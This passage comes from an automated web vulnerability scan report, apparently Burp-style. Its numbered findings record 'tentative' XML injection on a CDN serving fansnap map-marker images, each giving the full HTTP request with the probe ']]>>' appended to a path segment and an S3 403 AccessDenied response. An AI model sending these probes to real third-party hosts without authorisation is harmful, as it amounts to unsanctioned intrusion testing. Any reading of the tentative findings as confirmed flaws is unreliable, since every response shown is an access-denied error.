GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-cc3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7CEE2CC80A98734B
x-amz-id-2: qeUIXNdkPEPaxAGTB1Bu4+TGEIp0ulLqvDyMKYX1prPRtolxsGuafBIHRjduelHe
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Age: 2
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9d8a5fed6e6d972787e049d6d1d86724b179c52ffdb7e5bc5950eda3302f0d678438f0d94c28f595
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7CEE2CC80A98734B</RequestId><HostId>qeUIXNdkPEPaxAGTB1Bu4+TGEIp0ulLqvDyMKYX1prPRtolxsG
...[SNIP]...

8.121. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EB8B43F09E46589F
x-amz-id-2: hovBFBlPZ+/UTWGUS9sOQ2W/XiUhkx/6ZA/QhwO7Hsf0gVZHP8hY4n2w7KoWlTkd
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 14809b21fa1cbe5523f7ecfedbfc5db48ee0342cf2e50cf1e695d3c460a71e2c14bb342bf97293cf
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EB8B43F09E46589F</RequestId><HostId>hovBFBlPZ+/UTWGUS9sOQ2W/XiUhkx/6ZA/QhwO7Hsf0gVZHP8
...[SNIP]...

8.122. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-cc3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2ADF40194E084633
x-amz-id-2: mnUcpBlcgN+W8cOAoQHkSU/unTtILGzXBAD7bV2n0ArWLaIMoNqUHJ0g2Mxy32uV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1d017cc89ec9c9aeef20cec1f0fbe245b183127503ab14a64afb0fd20e17badf43381c904964436d
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2ADF40194E084633</RequestId><HostId>mnUcpBlcgN+W8cOAoQHkSU/unTtILGzXBAD7bV2n0ArWLaIMoN
...[SNIP]...

8.123. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-cc3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 059BBEB2EB8124C5
x-amz-id-2: MdJGpWG1qRx4tymq+AHDRqqwVtLpmUH8CgyHmhoFlg3zpJYXJ3B7CCAcXzhOUVe8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 355a28f243484a05830482cde63e74bf4f6b4aec13273fc4c4357d0006c9579584e3739693452ded
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>059BBEB2EB8124C5</RequestId><HostId>MdJGpWG1qRx4tymq+AHDRqqwVtLpmUH8CgyHmhoFlg3zpJYXJ3
...[SNIP]...

8.124. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-cc3333-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E4C697EDE931CD19
x-amz-id-2: VXNJnrh3y768Ye+8jpNj8IkDT4Nqa8jAsE710zogc4qZ8Pr13Z5qVjrdGyGOGcjv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ef8d9700f80ca23aad88976a4ac8e1e0abfe13f972446bdd083dfcf1cd0c61d013bfea42b8eba456
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E4C697EDE931CD19</RequestId><HostId>VXNJnrh3y768Ye+8jpNj8IkDT4Nqa8jAsE710zogc4qZ8Pr13Z
...[SNIP]...

8.125. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F4FAA48C4D736F08
x-amz-id-2: m6ZV6FRwpYWFCtNLyq0yI6V8c1aE6WTeOFaxWSSI9yiWnpI4dYeP3AwZMZ5UpPPA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 464afedc325e8608d8b484a0d27324015951672f79fa12a7a661ea8343ca525b7d02d194fded0f9d
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F4FAA48C4D736F08</RequestId><HostId>m6ZV6FRwpYWFCtNLyq0yI6V8c1aE6WTeOFaxWSSI9yiWnpI4dY
...[SNIP]...

8.126. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 93A79499E53AB57F
x-amz-id-2: ntlcoqAcq7D9xadCQePOsU8N1N+gzbMkNkHADjSXvKjSwUxeIQK+hoYX3+JTvru4
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a0a8fcda183941e26edbb508cefb04ed28723bc0801d54c9ce53e53318deedb96688bdc8525b8a24
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>93A79499E53AB57F</RequestId><HostId>ntlcoqAcq7D9xadCQePOsU8N1N+gzbMkNkHADjSXvKjSwUxeIQ
...[SNIP]...

8.127. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8C682DA149B3B916
x-amz-id-2: V6dEwZ3e+8/wMw3F6p+5SGs0gw0O9tj4A+cuWd79z7+al2MdEpHVAP3FUc4/1bly
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f692f9f3f098dc8b25dad9963aab54003c1961f88cbbe19ed154b7b490d88de4b45b0fd4efdd92f5
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8C682DA149B3B916</RequestId><HostId>V6dEwZ3e+8/wMw3F6p+5SGs0gw0O9tj4A+cuWd79z7+al2MdEp
...[SNIP]...

8.128. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F65F6487FF63B9A5
x-amz-id-2: Oh/WWDqr3+ulqllEckrt2So/cutpRQdgQp1q1bjnkpEzVXbRDisI/oItDxf2rAt9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e5c4171ba0b3d7a547ec4ca57ce4632c5cfa9e0b5fdd95ea1b53b386908dbe0bee09a63ff43b4f76
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F65F6487FF63B9A5</RequestId><HostId>Oh/WWDqr3+ulqllEckrt2So/cutpRQdgQp1q1bjnkpEzVXbRDi
...[SNIP]...

8.129. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 99ADDF1DD1A71543
x-amz-id-2: xF8gozuUX7cCTIu14wQskeqJU+af8/RJVeoZdB/pvIefYqVV+UZz3cXRAW9kwUG9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 04ad63783de3a806e64bf205490c72d2dff5df5bfa26b4b0e9d23ea3474f1c00ae3e1ffc58658e26
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>99ADDF1DD1A71543</RequestId><HostId>xF8gozuUX7cCTIu14wQskeqJU+af8/RJVeoZdB/pvIefYqVV+U
...[SNIP]...

8.130. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F41E2D4AEDD260D8
x-amz-id-2: Z6z9haYtqe9rB/DLWyBv1klTYdB19pDYmHaLR0JltWa4AygSk9hT35cN3SvuwORp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ae7cb235a801921dbc7b7d1c5a36016df7ccd658bf5c07f4c4b21b2c9477ab1c732a3a020333f0db
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F41E2D4AEDD260D8</RequestId><HostId>Z6z9haYtqe9rB/DLWyBv1klTYdB19pDYmHaLR0JltWa4AygSk9
...[SNIP]...

8.131. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 377FBDCC29C31230
x-amz-id-2: RzRhHHK3aHKwhsxS4I8d+VQbrSJq/ZRsD0kFS4t9ea8X9Z7waF+frcWt+Q3GgVvN
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:12 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 51a4ff1fb636cb8ad5b6c199b4b9c9fd1bea5c9799a403576b853cfdd50b4572e48b00011912dd94
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>377FBDCC29C31230</RequestId><HostId>RzRhHHK3aHKwhsxS4I8d+VQbrSJq/ZRsD0kFS4t9ea8X9Z7waF
...[SNIP]...

8.132. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff3333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E7483FE997F729DE
x-amz-id-2: 2/cWkLeIPBPye+LRMQi5QP0NHjMfd5HouwuqUHlLUCeDAQRm/30ufTWdb1NCOPfE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 57d38ba1ab33ddbf741b059fb1e2bfc091ba25958c6522fbfe1665b9a5837fbd4a7547e5d5884402
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E7483FE997F729DE</RequestId><HostId>2/cWkLeIPBPye+LRMQi5QP0NHjMfd5HouwuqUHlLUCeDAQRm/3
...[SNIP]...

8.133. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

